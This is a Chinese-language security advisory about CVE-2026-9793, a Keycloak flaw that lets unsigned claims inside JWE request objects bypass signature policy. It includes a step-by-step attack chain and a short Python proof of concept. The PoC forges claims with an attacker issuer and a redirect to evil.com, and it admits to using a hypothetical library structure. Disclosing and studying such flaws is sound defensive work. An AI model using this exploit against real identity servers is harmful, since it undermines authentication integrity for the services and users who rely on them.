IPBUF安全漏洞报告
English
CVE-2026-9793 CVSS 5.9 中危

CVE-2026-9793 Keycloak JWE签名校验绕过漏洞

披露日期: 2026-05-28

漏洞信息

漏洞编号
CVE-2026-9793
漏洞类型
签名校验绕过
CVSS评分
5.9 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Keycloak

相关标签

签名校验绕过OIDCKeycloakJWE数据完整性

漏洞概述

Keycloak在处理JWE加密的请求对象时存在缺陷。当解密内容为原始JSON时,可能错误处理未签名声明,从而绕过签名策略。攻击者可利用此漏洞在OIDC授权流程中提交未经授权的声明,破坏数据完整性,尽管重定向URI白名单能提供一定补偿,但仍违反OIDC标准要求。

技术细节

该漏洞源于Keycloak在处理JWE(JSON Web Encryption)加密请求对象时的逻辑缺陷。正常情况下,OIDC和FAPI要求对关键声明进行签名验证。然而,当攻击者构造特定的JWE请求,其解密后的载荷为原始JSON格式而非标准的JWS(JSON Web Signature)结构时,Keycloak会跳过对签名的校验。这导致系统配置的签名策略被绕过。尽管重定向URI白名单提供了一定的边界限制,但攻击者仍可以利用此漏洞在授权流程中提交未经授权的声明,严重威胁数据完整性。

攻击链分析

STEP 1
1. 信息收集
攻击者获取目标Keycloak服务器的公钥以及客户端配置信息。
STEP 2
2. 构造恶意载荷
攻击者创建包含未授权声明的原始JSON载荷,旨在绕过签名验证。
STEP 3
3. 生成JWE请求
攻击者使用目标公钥加密该载荷,生成JWE格式的请求对象,内部不包含签名。
STEP 4
4. 发送请求
攻击者将构造的JWE作为请求对象发送至Keycloak的授权端点。
STEP 5
5. 绕过验证
Keycloak解密JWE,发现内容为原始JSON,错误地跳过签名校验,接受未授权声明。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import json import jose.jwe from cryptography.hazmat.primitives import serialization # Target Keycloak's Public Key (PEM format) TARGET_PUBLIC_KEY_PEM = """-----BEGIN PUBLIC KEY----- ... (Target Key) ... -----END PUBLIC KEY-----""" # Malicious claims to be injected malicious_payload = { "iss": "https://attacker-controlled-issuer", "aud": "target-client-id", "response_type": "code", "client_id": "target-client-id", "redirect_uri": "https://evil.com/callback", # ... other claims to bypass policy } # Load the public key public_key = serialization.load_pem_public_key(TARGET_PUBLIC_KEY_PEM.encode()) # Create a JWE (JSON Web Encryption) containing raw JSON # This bypasses the internal JWS signature check expected by OIDC/FAPI # Note: Using a hypothetical JWE library structure for demonstration encrypted_request = jose.jwe.encrypt( json.dumps(malicious_payload).encode('utf-8'), public_key, algorithm="RSA-OAEP", encryption="A256GCM" ) print(f"Generated Malicious JWE Request Object: {encrypted_request.decode('utf-8')}")

影响范围

Keycloak (具体受影响版本请参考Red Hat官方安全公告)

防御指南

临时缓解措施
建议管理员严格配置重定向URI白名单作为临时补偿控制,并密切关注官方安全公告以获取补丁更新。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表